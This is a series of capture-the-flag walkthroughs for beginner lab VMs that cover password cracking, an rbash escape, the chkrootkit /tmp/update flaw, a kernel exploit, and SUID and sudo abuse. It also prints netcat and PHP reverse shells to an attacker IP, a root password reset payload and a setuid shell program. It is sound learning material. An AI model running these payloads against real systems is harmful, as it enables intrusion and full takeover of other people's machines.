Shelling Decoy

Overview:

Target Machine IP Address: 192.168.56.42
My Machine IP Address: 192.168.56.20

Mission:

THIS IS A MACHINE FOR COMPLETE BEGINNERS; THERE ARE THREE FLAGS AVAILABLE IN THIS VM.

FROM THIS VM YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.42 -oN nmap.log


PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

80/tcp open http Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip

The zip file (save.zip, which nmap's http-ls script listed in the web root) is password protected, and nothing found so far looks like a usable password. Let's brute-force it with fcrackzip and rockyou.txt.

 fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip 

password: manuel

The archive gives us some juicy information. I am not going to go through each file here, but you surely know that the shadow file holds the hashed passwords of the users, and I think that is enough.

We need to crack the hash, so let's use john. Take the hash we need out of the shadow file and put it in a file of its own (use single quotes: inside double quotes the shell would expand $6 and $x4sSRFte6R6BymAn as variables and silently mangle the hash):

username: 296640a3b825115a47b68fc44501c828

echo '$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.' > ../hash.txt

Running john against hash.txt with rockyou.txt recovers the password used below.

ssh 296640a3b825115a47b68fc44501c828@192.168.56.42

password: server

We need to bypass the rbash restriction. I had never dealt with it before; I had only seen it in blog posts and in IppSec's YouTube videos.

If you want to know more about rbash bypasses, read the Linux Restricted Shell Bypass Guide on Exploit-DB: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

I tried all the commands from that PDF and none of them worked. However, when I tried the following from its Advanced Techniques section, the rbash restriction message no longer appeared:

ssh 296640a3b825115a47b68fc44501c828@192.168.56.42 -t "bash --noprofile"

Now, instead of the rbash restriction, we get "command not found", which means the PATH in this shell is unusable and needs to be fixed.

What I did was echo the PATH of my Kali machine, copy it and set it in the shell on the target (the screenshot shows this). The standard directories are what matter; the Go entries at the end are specific to my Kali box.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/go/bin/:/root/go-workspace/bin
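To see why the ssh -t trick works, here is an added example that is not from the original writeup. It reproduces the mechanics locally with bash -r, which is the same thing as rbash: on the target, sshd hands the -t command to the user's login shell (rbash), which is allowed to run "bash" because it is a bare name found on PATH, and the child bash is an ordinary, unrestricted shell. The example also shows that PATH is read-only inside rbash, which is why it could only be repaired after escaping. It assumes bash is installed on the machine you run it on.

```shell
#!/bin/sh
# Added example, not from the original writeup. "bash -r" is rbash, so these
# functions reproduce what the restricted login shell refuses and why the
# ssh -t "bash --noprofile" trick escapes it. Assumes bash is installed.

# Run a command line inside a restricted bash, stderr merged into the output so
# the "restricted" diagnostics are visible to the caller.
in_rbash() {
    bash -r -c "$1" 2>&1
}

# Run the same command line from a child bash started inside the restricted one.
# rbash may run "bash" because it is a bare command name found on PATH; the
# child is an ordinary bash, so the restrictions end with the parent.
via_child_bash() {
    bash -r -c "bash --noprofile -c '$1'" 2>&1
}

# Three things rbash refuses: changing directory, command names containing a
# slash, and assigning PATH (read-only in rbash, which is why the writeup could
# only repair PATH after escaping).
demo_restrictions() {
    in_rbash 'cd / && pwd'
    in_rbash '/bin/pwd'
    in_rbash 'PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin'
    return 0
}

# The same directory change succeeds once a child bash runs it.
demo_escape() {
    via_child_bash 'cd / && pwd'
}

echo '--- inside rbash ---'
demo_restrictions
echo '--- from a child bash started inside rbash ---'
demo_escape
```

Run it and compare the two halves: the restricted attempts print "restricted" or "readonly variable", while the child bash simply prints "/".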

Ok, let's download pspy on the Kali machine and then transfer it to the target. I used SimpleHTTPServer for that; of course, use whatever method you prefer 🙂

Let's run searchsploit chkrootkit, or google chkrootkit exploit (Exploit-DB is the web front end of the same database that searchsploit queries offline).

The exploit's notes explain how to set it up and how to use it.

The steps are self-explanatory. What I did was locate the nc binary on the target and make the planted file run /bin/sh connected back to port 1234 on 192.168.56.33 (my Kali machine). As the instructions say, the file must be given execute permission.

Note: I checked the cron entries and found nothing that refers to the update file we created, nor anything related to chkrootkit. Interestingly, pspy64 shows /tmp/update being run periodically, so we can use that. This is exactly chkrootkit's weakness: versions before 0.50 execute an existing /tmp/update with their own privileges, which is root when chkrootkit runs from cron. Here the trigger may well be honeypot.decoy, which seems to run chkrootkit each time it runs.
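The mechanism behind that note, as an added example that is not part of the original writeup or of chkrootkit itself: chkrootkit before 0.50 contained a line of the form file_port=$file_port $i inside a loop over candidate filenames that included /tmp/update. Because the right-hand side is unquoted, the shell parses the line as the command named by $i preceded by a temporary variable assignment, so an existing executable /tmp/update is run with chkrootkit's privileges. The script below reproduces that bug class in a throwaway directory instead of /tmp, beside the quoted form that fixes it; the sandbox layout and the marker file are my own choices.

```shell
#!/bin/sh
# Added example, not from the original writeup or from chkrootkit itself.
# Reproduces the unquoted-assignment bug that made chkrootkit execute
# /tmp/update, using a temporary directory so nothing touches the real /tmp.

# Create a sandbox containing an executable "update" that records that it ran.
# Prints the sandbox path.
setup_sandbox() {
    dir=$(mktemp -d)
    cat > "$dir/update" <<'EOF'
#!/bin/sh
# Stand-in for the attacker's payload: just leave a marker next to ourselves.
touch "$(dirname "$0")/RAN_AS_$(id -un)"
EOF
    chmod +x "$dir/update"
    printf '%s\n' "$dir"
}

# The vulnerable idiom. Intent: append $i to the list held in $file_port.
# Reality: "file_port=... cmd" is the syntax for running cmd with a temporary
# environment assignment, so the shell executes the file named by $i.
vulnerable_slapper() {
    SLAPPER_FILES="$1/update"
    file_port=
    for i in ${SLAPPER_FILES}; do
        if [ -f "${i}" ]; then
            file_port=$file_port $i     # BUG: runs $i instead of building a string
        fi
    done
    # 0 when the planted file was executed, 1 when it was not
    [ -e "$1/RAN_AS_$(id -un)" ]
}

# The corrected idiom (the upstream fix): quote the value so the whole line is
# an assignment and nothing gets executed.
fixed_slapper() {
    SLAPPER_FILES="$1/update"
    file_port=
    for i in ${SLAPPER_FILES}; do
        if [ -f "${i}" ]; then
            file_port="$file_port $i"   # only string building happens here
        fi
    done
    [ -e "$1/RAN_AS_$(id -un)" ]
}

# Stand-alone run: show both outcomes, then clean up.
d=$(setup_sandbox)
vulnerable_slapper "$d" && echo "vulnerable idiom executed $d/update as $(id -un)"
rm -rf "$d"
d=$(setup_sandbox)
fixed_slapper "$d" || echo "fixed idiom left $d/update alone"
rm -rf "$d"
```

Run as an ordinary user the marker is created by that user; on the Decoy box the same line runs from root's cron, which is the whole privilege escalation.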

Exploit 1:

#!/bin/bash
# chkrootkit executes this file as root, so the sudo is not strictly needed; it does no harm.
echo 'root:tcert.net' | sudo chpasswd

Save it as /tmp/update (you have to use nano this time because, if I am not mistaken, vi is not available on the box).

chmod +x update, then wait for chkrootkit's next run (I sipped tea and looked around), and then

su - root 

password: tcert.net 

 

Exploit 2: (It didn't work for me; I need to dig a little deeper. One likely cause is the syntax: nc takes the host and the port as two separate arguments, not host:port; the -e option exists only in netcat-traditional and ncat, not in the OpenBSD netcat; and a listener must already be waiting on port 1234 on the Kali machine when chkrootkit runs the file.)

printf '#!/bin/bash\n/usr/bin/nc -e /bin/sh 192.168.56.33 1234\n' > update
chmod +x update

That’s all guys 🙂

Let’s pwn cybersploit machine

Overview:

Target Machine IP Address: 192.168.56.40
My Machine IP Address: 192.168.56.20

Mission:

THIS IS A MACHINE FOR COMPLETE BEGINNERS; THERE ARE THREE FLAGS AVAILABLE IN THIS VM.

FROM THIS VM YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.40 -oN nmap.log

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))

The site on port 80 gives us a username and two strings worth noting down:

username: itsskv

cybersploit

CyBeRSplOiT

I ran nikto but got nothing; gobuster, however, did find something:

gobuster dir -u 192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

http://192.168.56.40/robots.txt

It contains an encoded string:

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

Let's decode the string (it is base64, not encryption):

echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d

Flag1: cybersploit{youtube.com/c/cybersploit}

By the way,  you might be wondering what is at http://192.168.56.40/hacker  (it was just a gif).

Ok since, we got the username: itsskv

And password:  cybersploit{youtube.com/c/cybersploit}

And the box is running ssh, how about we try that first?

ssh itsskv@192.168.56.40

ls -lah

cat flag2.txt

I used this website to decode the binary: https://cryptii.com/pipes/binary-to-english

good work !
flag2: cybersploit{https:t.me/cybersploit1}
uname -a

3.13.0-32-generic

Googling 3.13.0-32-generic exploit (searchsploit didn't work for me; I will figure that out later) leads to the overlayfs local privilege escalation for Ubuntu 3.13 kernels:

https://www.exploit-db.com/exploits/37292

 gcc 37292.c -o exploit

./exploit

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

That’s it guys! Going to have breakfast now … little hungry lol

Wish you a productive day!!

Let’s take down victim01

Overview:

Pwned Machine IP Address: 192.168.56.38
My Machine IP Address: 192.168.56.20

Mission:

To gain access to root and read the flag file Flag.txt.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- -oN nmap.log 192.168.56.38

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

8080/tcp open http BusyBox httpd 1.13

8999/tcp open http WebFS httpd 1.21

9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)

http://192.168.56.38:8999 serves a capture file, WPA-01.cap. Let's download it.

Let's open the capture in Wireshark:

wireshark WPA-01.cap &

I tried my best to dig into the cap file but could not get anything concrete. Based on the previous machine we did, I had a hunch that a username and a password would come out of it.

Although the capture shows many devices connected to the router (dlink), only dlink worked as a username. You might wonder how I got the password; you will know if you have read this post.

Yes, I ran aircrack-ng on the CAP file with the rockyou wordlist:

aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt

Yes, the password is p4ssword

ssh dlink@192.168.56.38        password: p4ssword

I have made it a habit, as soon as I get a limited (user) shell, to manually check all the low-hanging fruit, such as

sudo -l

cat ~/.viminfo

crontab -l

history

find / -perm -u=s -type f 2>/dev/null

find / -perm 0777 -type f 2>/dev/null

find / -writable -type d 2>/dev/null

to name a few. If nothing turns up, I upload linpeas.sh and similar scripts to the /tmp folder of that limited account and run them.

We found something interesting: nohup has the SUID bit set (it shows up in the -perm -u=s search above), and GTFOBins has an entry for exactly that:

https://gtfobins.github.io/gtfobins/nohup/

Note: kindly bookmark this site: https://gtfobins.github.io/

nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"

The -p keeps the effective uid instead of dropping it, and the tty redirections are needed because nohup would otherwise send the shell's output to nohup.out. Yeah, we got the flag.

Method 2:

To find writable directories:

find / -writable -type d 2>/dev/null

/var/www/bolt/public/files has mode 777 (world-writable).

If you read the nmap output carefully, you saw that the box also runs the PHP CLI (built-in) web server on port 9000. If that server serves this directory, we can drop a PHP reverse shell into it and trigger it from a browser.

Let’s do that..

On Kali Machine

I keep my downloaded shells and other tools in /opt, so serve that directory:

python -m SimpleHTTPServer 8000

On Victim01 Machine

cd /var/www/bolt/public/files/

wget 192.168.56.33:8000/php-reverse-shell.php

chmod +x php-reverse-shell.php

(The chmod is not actually needed: the web server only has to read the file; it never executes it as a program.) Also change the IP address and port inside the shell to your own. Mine: IP 192.168.56.33, port 1234.

Set up an nc listener on the Kali machine, on the port you put in the shell, to receive the reverse connection from the Victim01 machine.

I first ran the PHP shell directly on the victim machine and got a reverse connection, but only a limited shell. When I instead requested the PHP file through the browser, I got a shell with root privileges. At the time I did not know the reason and wanted to explore it further. The explanation is that the script runs with the privileges of whatever executes it: from the SSH session that is the dlink user, whereas the built-in PHP server on port 9000 had evidently been started as root, so everything it executes, our shell included, runs as root. A web server running as root plus a world-writable document root is a straight path to root, and it is worth keeping in mind on other boxes.

yes, another way to get root!

That’s all guys 🙂

Writeup for Troll3 machine

Overview:

Target Machine IP Address: 192.168.56.26
My Machine IP Address: 192.168.56.1

Mission:

To gain access to root and read the flag file Flag.txt.

To know the IP address of the Target Machine:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24


(screenshot: arp-scan output)

Scanning the Network

nmap -sC -sV -p- 192.168.56.26 -oN nmap.log

  • -sC run the default nmap scripts
  • -sV reveal the services running on the target with their version numbers
  • -p- scan all 65535 ports
  • -oN save normal output to nmap.log

The VM console shows start:here, so I tried SSH with start as the username and here as the password, and it worked.

Since start is not a sudoer, sudo -l could not tell me which commands it may run.

However, there were two folders.

  • bluepill
    • awesome_work
  • redpill
    • this_will_surely_work

Both awesome_work and this_will_surely_work are ASCII text files.

bluepill contains a shortened link. Such links can lead anywhere, including drive-by download pages, so I checked it with VirusTotal first.

VirusTotal reported nothing (a good crypter can still evade such a scan, but let's not go into that here).

Now let's unshorten the link. Many free services do this; pick whichever you prefer.

Ok, it’s just a rabbit hole.

cat redpill/this_will_surely_work

Another rabbit hole : (

Let's enumerate the target for files with unusual permissions. The search below lists files with mode 777; a separate search for the SUID/SGID bits (find with -perm -u=s or -perm -g=s, as used in the Victim01 writeup) is worth running too.

find / -perm 0777 -type f 2>/dev/null

Since I am using Ubuntu Desktop, I need to install the openssh-server package to receive files from the target machine over scp.

sudo apt install openssh-server -y

sudo systemctl start ssh

scp /var/log/.dist-manage/wytshadow.cap researcher@192.168.56.1:/home/researcher/vulhub/Troll3/2

Narration: I am transferring wytshadow.cap from the victim machine to /home/researcher/vulhub/Troll3/2 on my local machine.

Also transfer gold_star.txt (it looks like a password dictionary).

We can analyze wytshadow.cap in Wireshark (GUI), but let's try tcpdump from the terminal instead.

tcpdump analysis: pending

By the look of it, I am going to guess that wytshadow is a username and the password is in the .cap file, which holds a WPA handshake.

We can crack the password using aircrack-ng package with password dictionary list which we got from the victim machine – gold_star.txt .

aircrack-ng -w gold_star.txt wytshadow.cap

gaUoCe34t1

ssh wytshadow@192.168.56.26

password: gaUoCe34t1

./oohfun

Control+C to stop the execution.

I checked crontab and no entry was there.

Let's find out whether any binary can be run with sudo:

sudo -l (password: gaUoCe34t1)

Yes, we got something: nginx can be run with sudo.

Let's check the nginx configuration and see which port it listens on. You might wonder why I suddenly take an interest in the config file: it is because sudo is allowed for nginx, so I am looking for anything in its configuration that can be leveraged.

cat /etc/nginx/sites-enabled/default

The config shows that, once nginx is running, something involving Lynx is served on port 8080.

Let's verify whether anything is listening on port 8080 yet:

netstat -ntap

Actually, this is redundant: we already know from nmap.log that nothing was listening on port 8080.

Anyway, let's start nginx (the sudo entry allows it); I also need to google Lynx to learn what it is:

/usr/sbin/service nginx start

Now something is listening on port 8080.

Lynx, I found out, is a command-line web browser. You can read more about it here.

For our purpose, what we can do is

lynx http://192.168.56.26:8080

genphlux:HF9nd0cR!

ssh genphlux@192.168.56.26

password: HF9nd0cR!

ls

cat maleus

Copy the content of maleus into a file called key:

-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

chmod 400 key

My guess: there is a user called maleus and this is his SSH private key. Shall we try it?

ssh maleus@192.168.56.26 -i key

indeed, it did work!

ls

dont_even_bother

file dont_even_bother

It is an ELF 64-bit LSB executable.

Let's execute it. (Running unknown binaries is risky: unless you are a malware analyst with proper isolation, never execute them on your host machine, only inside a virtual machine.)

./dont_even_bother

It is expecting a password and I did try things which I could think of. No luck 🙁

Let me run strings on it:

strings dont_even_bother | less

We got something interesting:

xl8Fpx%6

just a rabbit hole

cat /etc/os-release

VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic 

I was getting a little desperate here because I could not find anything useful. I checked the kernel version, OS release, crontab entries, history, etc.

Then I tried

cat .viminfo | less

and guess what I found?

password: B^slc8I$ (not sure yet what it is for)

Shall we try sudo -i?

No, B^slc8I$ is not the root password (let's keep it around for a while).

Then I tried sudo -l with the password B^slc8I$.

Yeh! Finally...
Yeh! Finally…

sudo -l shows that dont_even_bother can be run as root, so we can replace it with our own program that spawns a shell; the sudo rule only cares about the path, not the contents. Write the source next to it:

vi dont_even_bother.c

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(void)
{
    /* under sudo the effective uid is 0; make the real uid 0 as well so the
       spawned shell does not drop privileges */
    setuid(geteuid());
    system("/bin/bash");
    return 0;
}

:wq! (to save and quit vim, for new users)
source code credit

To compile it, overwriting the original binary at the path the sudo rule allows:

gcc dont_even_bother.c -o dont_even_bother

Any compiler warnings can be ignored.

Let's execute our code:

sudo ./dont_even_bother

Will I get a root access to PumpkinRaising Machine ?

Overview:

Pumpkin Raising Machine IP Address: 192.168.56.17
My Machine IP Address: 192.168.56.1

Mission:

Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinRaising is Level 2 of series of 3 machines under Mission-Pumpkin v1.0. The Level 1 ends by accessing PumpkinGarden_Key file, this level is all about identifying 4 pumpkin seeds (4 Flags - Seed ID’s) and gain access to root and capture final Flag.txt file.

Step 01:

nmap -sC -sV -p- 192.168.56.17 -oN nmap.log

Output:

Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-01 13:30 IST
Nmap scan report for 192.168.56.17

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd
| http-robots.txt: 23 disallowed entries (15 shown)
| /includes/ /scripts/ /js/ /secrets/ /css/ /themes/ 
| /CHANGELOG.txt /underconstruction.html /info.php /hidden/note.txt 
| /INSTALL.mysql.txt /seeds/seed.txt.gpg /js/hidden.js /comment/reply/ 
|_/filter/tips/
|_http-server-header: Apache
|_http-title: Mission-Pumpkin

Step 02:

Actually, nmap already reveals enough to go on, but let me stick to my methodology.

The box is clearly running a web server on port 80, so let's visit the site and look at its source first.

I saw an images folder and got a little excited, because the previous box hid a nice tip there (it is here).

Oops, nothing this time!

Step 03:

You can also see a base64-encoded message in the source code.

I thought it might reveal a big secret like it did on my previous pumpkin box, but it turned out to be a little troll 🙂

Going through the source, I saw a link to pumpkin.html.

I noted down the names of the characters, since they could be useful for brute-forcing SSH later (nmap showed SSH on port 22).

The source contains another encoded string, which turned out to be base32 (I read up on base32 and checked the alphabet myself to be sure).

Besides, if you scroll to the bottom, there is a hex string as well.

For the time being I saved the hex to a file called hex.txt and set it aside, because the base32 string needs decoding first.

I downloaded the pcap file and traced it in Wireshark.

(Screenshots 1 to 6: opening spy.pcap in Wireshark, Follow TCP Stream.)

Based on screenshots 3 and 4 we got another seed. Do you see it? If not, look closely.

To be honest, I did not see it at first. I knew the seed ID was 50609, so I ran strings on the capture and everything became clear. See here:

strings spy.pcap

Hence we got a Jack-Be-Little Pumpkin seeds ID: 50609

Step 04:

Don't forget that we still have a hex string to decode. Here we go:

cat hex.txt | xxd -p -r

Acorn Pumpkin Seeds ID: 96454

Step 05:

Let's check robots.txt.

Output:

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images

# Directories
Disallow: /includes/
Disallow: /scripts/
Disallow: /js/
Disallow: /secrets/
Disallow: /css/
Disallow: /themes/

#Images
Allow: /images/*.gif
Allow: /images/*.jpg

# Files
Disallow: /CHANGELOG.txt
Disallow: /underconstruction.html
Disallow: /info.php
Disallow: /hidden/note.txt
Disallow: /INSTALL.mysql.txt
Disallow: /seeds/seed.txt.gpg
Disallow: /js/hidden.js


# Paths (clean URLs)
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /scripts/pcap
Disallow: /node/add/
Disallow: /security/gettips/
Disallow: /search/hidden/
Disallow: /user/addme/
Disallow: /user/donotopen/
Disallow: /user/
Disallow: /user/settings/

I must admit that when I saw this exhaustive list I got very excited, but in the end only a handful of the entries (highlighted in the original screenshot) actually worked or revealed anything of interest.

Step 06:

While going through the folders listed in robots.txt, I found this interesting information:

Robert : C@43r0VqG2=
Mark : Qn@F5zMg4T
goblin : 79675-06172-65206-17765

I thought these might be SSH credentials (nmap shows SSH running), but they didn't work. So I noted them down and continued enumerating.

Step 07:

I found another intriguing file at /seeds/seed.txt.gpg on the target (see here). It is encrypted with gpg.

I downloaded seed.txt.gpg and googled the syntax to decrypt a gpg file:

gpg --decrypt seed.txt.gpg

I tried the different passwords gathered during the enumeration above. The one that worked:

Password: SEEDWATERSUNLIGHT

You might wonder how I got SEEDWATERSUNLIGHT. I wrote down almost every word that could plausibly be a password into a list and tried each one manually. (The following screenshot is my note.)

By the way, I found this word here. If you view the source code, you will see that the sign is nothing but a space.

Do you see the space in the source code? (Don't look at the selected strings.)

See my failed attempts, lol.

Finally I got this.

After some googling, I found that the pictorial representation above is Morse code.

So we have to decode it. You can simply google for an online Morse code decoder; there are many, and the one I like most is CyberChef: https://gchq.github.io/CyberChef/

It has many other features as well; all you have to do is search for Morse and choose the From Morse Code operation.

We got a SEED:

BIGMAXPUMPKIN  SEEDS ID: 69507
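The base64 string on the cybersploit box, the binary in its flag2.txt, and the base32, hex and Morse strings on this box were all decoded with online tools above. As an added example (not code from the original writeups), here is a small POSIX shell decoder that guesses the encoding from the alphabet and decodes it offline, so flags and credentials never leave your machine. The detection order, the "?" for unknown Morse codes and the sample strings are my own choices; it needs only coreutils (base64, base32) and standard shell utilities.

```shell
#!/bin/sh
# Added example, not code from the original writeups: an offline decoder for the
# encodings met on these boxes. base64/base32 come from coreutils; hex, 8-bit
# binary and Morse are decoded in plain POSIX shell.

# Letters A-Z then digits 0-9, in the same order as the Morse codes below.
MORSE_CHARS="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
MORSE_CODES=".- -... -.-. -.. . ..-. --. .... .. .--- -.- .-.. -- -. --- .--. --.- .-. ... - ..- ...- .-- -..- -.-- --.. ----- .---- ..--- ...-- ....- ..... -.... --... ---.. ----."

# Write one byte given its decimal value (printf octal escape, so 0-255 all work).
emit_byte() {
    printf "\\$(printf '%03o' "$1")"
}

# Guess the encoding from the alphabet alone. Narrow alphabets go first: every
# binary string is valid hex, every hex string is valid base64, and the base32
# alphabet is a subset of base64's, so the order decides the ambiguous cases.
detect_encoding() {
    s=$(printf '%s' "$1" | tr -d ' \n\r')
    if printf '%s' "$1" | grep -Eq '^[.-]+([ /]+[.-]+)* *$'; then
        echo morse
    elif printf '%s' "$s" | grep -Eq '^[01]+$' && [ $((${#s} % 8)) -eq 0 ]; then
        echo binary
    elif printf '%s' "$s" | grep -Eq '^[0-9a-fA-F]+$' && [ $((${#s} % 2)) -eq 0 ]; then
        echo hex
    elif printf '%s' "$s" | grep -Eq '^[A-Z2-7]+=*$'; then
        echo base32
    elif printf '%s' "$s" | grep -Eq '^[A-Za-z0-9+/]+=*$'; then
        echo base64
    else
        echo unknown
    fi
}

# 8-bit binary, with or without spaces between the bytes.
decode_binary() {
    bits=$(printf '%s' "$1" | tr -cd '01')
    while [ ${#bits} -ge 8 ]; do
        rest=${bits#????????}
        byte=${bits%"$rest"}
        bits=$rest
        n=0
        for bit in $(printf '%s' "$byte" | sed 's/./& /g'); do
            n=$((n * 2 + bit))
        done
        emit_byte "$n"
    done
}

# Hex, two digits per byte, spaces ignored (same result as xxd -r -p).
decode_hex() {
    hex=$(printf '%s' "$1" | tr -cd '0-9A-Fa-f')
    while [ ${#hex} -ge 2 ]; do
        rest=${hex#??}
        pair=${hex%"$rest"}
        hex=$rest
        emit_byte "$((0x$pair))"
    done
}

# Morse: spaces separate letters, "/" separates words, unknown codes print "?".
decode_morse() {
    for token in $(printf '%s' "$1" | sed 's#/# / #g'); do
        if [ "$token" = "/" ]; then
            printf ' '
            continue
        fi
        i=1
        found=0
        for code in $MORSE_CODES; do
            if [ "$code" = "$token" ]; then
                printf '%s' "$MORSE_CHARS" | cut -c"$i" | tr -d '\n'
                found=1
                break
            fi
            i=$((i + 1))
        done
        [ "$found" -eq 1 ] || printf '?'
    done
}

# Detect, then decode; the decoded bytes go to stdout.
decode() {
    case $(detect_encoding "$1") in
        morse)  decode_morse "$1" ;;
        binary) decode_binary "$1" ;;
        hex)    decode_hex "$1" ;;
        base32) printf '%s' "$1" | tr -d ' \n\r' | base32 -d ;;
        base64) printf '%s' "$1" | tr -d ' \n\r' | base64 -d ;;
        *)      echo 'unrecognised encoding' >&2; return 1 ;;
    esac
}

# Stand-alone use: ./decode.sh '<encoded string>'
if [ $# -gt 0 ]; then
    decode "$1"
    echo
fi
```

Detection by alphabet is a heuristic, so a short all-digit string such as 01001000 is taken as binary even though it is also valid hex; when the guess is wrong, call the specific decode_ function directly.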

I know a little about steganography. After learning about it, I made it a habit to run exiftool, strings and stegosuite against any media file to extract hidden information. Trust me, it is a tedious task, but sometimes it pays off out of nowhere, lol.

Having said that, one image really did carry a text file with it.

I couldn't recall the exact box, but once, while pwning a box, I selected the whole page (Control+A) and a hidden message showed up. So I did a Control+A here, and do you see what I see in this message?

From this image and what we already know about the box, we can expect a gif called jackolantern.gif under images, which leads to

http://192.168.56.17/images/jackolantern.gif

There really is an image by that name, and the meticulous way the author hid it says a lot.

Yes, after running stegosuite with all the passwords collected so far, one finally worked:

command:

stegosuite -x jackolantern.gif -k Qn@F5zMg4T

We were able to extract a text message called decorative.txt 

cat decorative.txt 

We got another SEED ID i.e.

Lil’ Pump-Ke-Mon Pumpkin seeds ID : 86568

I want you to know that it is not only about the result; I think we need to celebrate the process as well, trying and enumerating everything you can think of.

To attest to what I am saying, I enclose one screenshot :)

If you read the notes on the website carefully, there is a hint that the pumpkin seed IDs must be arranged in order, and this screenshot helped me order them.

Sequence of the respective pumpkins and their seed IDs:

First: "Big Max Pumpkin": 69507
Second: "Jack-be-little": 50609
Third: "Acorn Pumpkin": 96454
Fourth: "Little Pump-ke-Mon": 86568

I tried many combinations of the users and passwords gathered so far over SSH. Here is my note.

(many) failed attempts: (one example)

I found that following credential gives us a shell.

Username: jack
password: 69507506099645486568

Among the usual checks (cron entries, SUID files, kernel version, etc.), I checked what the account may run with sudo:

sudo -l

My favourite goldmine site: https://gtfobins.github.io/

Run the command from the GTFOBins entry for the binary that sudo -l lists.

We got root, and the flag is here.

This box taught me many things, and I am going to revisit all the boxes I have pwned later, just to evaluate whether I really learned anything from them 🙂

That’s all… Wish you all a very productive time 🙂